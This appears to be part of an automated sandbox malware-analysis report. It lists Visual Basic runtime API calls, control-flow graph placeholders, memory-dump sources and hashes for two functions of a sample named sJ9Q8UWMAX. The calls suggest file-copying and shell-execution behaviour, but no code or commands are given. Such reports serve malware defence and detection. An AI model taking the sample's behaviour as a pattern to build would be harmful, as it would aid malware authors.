                                                                                                                                                                                  [Figure: control_flow_graph 343, starting at block 411590-41167e; legend: Executed / Not Executed]
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409C6C,00000000,00000000), ref: 004115AE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115DB
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115E7
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115F3
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00411602
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00411621
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00411630
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 00411644
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00411652
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411662
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00411669
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411676
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 004116AD
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 004116B4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004116BF
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004116CF
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004116DA
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004116EA
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004116F7
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0041170C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00411720
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00411735
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 0041173C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041175E
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,00000000,004025E6), ref: 0041178B
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,004025E6), ref: 00411792
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004117A9
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 004117B0
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004117DB
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(?,00000000), ref: 004117E6
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004117F6
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00411803
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411832
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041183B
                                                                                                                                                                                    • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                                                    • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                                                    • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                                                    • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                                                  • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041186A
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411879
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041188D
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041189B
                                                                                                                                                                                  • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118AD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118B8
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411911
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041191E
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041192E
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041193B
                                                                                                                                                                                  • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411979
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411984
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411994
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119A1
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119B1
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119BE
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E0
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E7
                                                                                                                                                                                  • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A16
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A25
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A39
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A47
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A57
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A5E
                                                                                                                                                                                  • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A71
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A85
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A93
                                                                                                                                                                                  • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AA5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AB0
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B09
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B16
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B26
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B33
                                                                                                                                                                                  • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B71
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B7C
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B8C
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B99
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BA9
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BB6
                                                                                                                                                                                  • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BD0
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BE5
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BEC
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BFC
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C03
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00406BF8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C19
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C24
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C31
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C47
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C56
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C5F
                                                                                                                                                                                  • #600.MSVBVM60(00004008,00000000), ref: 00411C85
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00411CE8), ref: 00411CBD
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CC6
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CCF
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CD8
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CE1
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00411CFF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                                                                                                                  • String ID: E
                                                                                                                                                                                  • API String ID: 1020712489-3568589458
                                                                                                                                                                                  • Opcode ID: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
                                                                                                                                                                                  • Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  [Control-flow graph beginning at block 408d7c-408d87; graph rendering not preserved]
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                                                    • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                                                    • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                                                    • Part of subcall function 00410180: FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0040ABAC
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ABDE
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AC25
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$Error$ListSystem$Ansi$Copy$Chkstk$#525#580#600#616BoundsBstrChangeCheckCloseConstruct2DestructFindGenerateHresultNotificationOverflowUnicode
                                                                                                                                                                                  • String ID: D
                                                                                                                                                                                  • API String ID: 4167556621-2746444292
                                                                                                                                                                                  • Opcode ID: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
                                                                                                                                                                                  • Instruction ID: 28a137cb3eb25e758eafbfe2ee42426fba9f6ce594aea99c4a1f109bb6dd76d7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 11f9facc399d33ccd5957aa5b8bc6d7bb7eda86f6c6e8ffcf1e3eddd6603bfbf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CE1B876900104EFD705EBE0EE989DF7BB9EB4C301B10812AF617A7264DF745A45CBA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

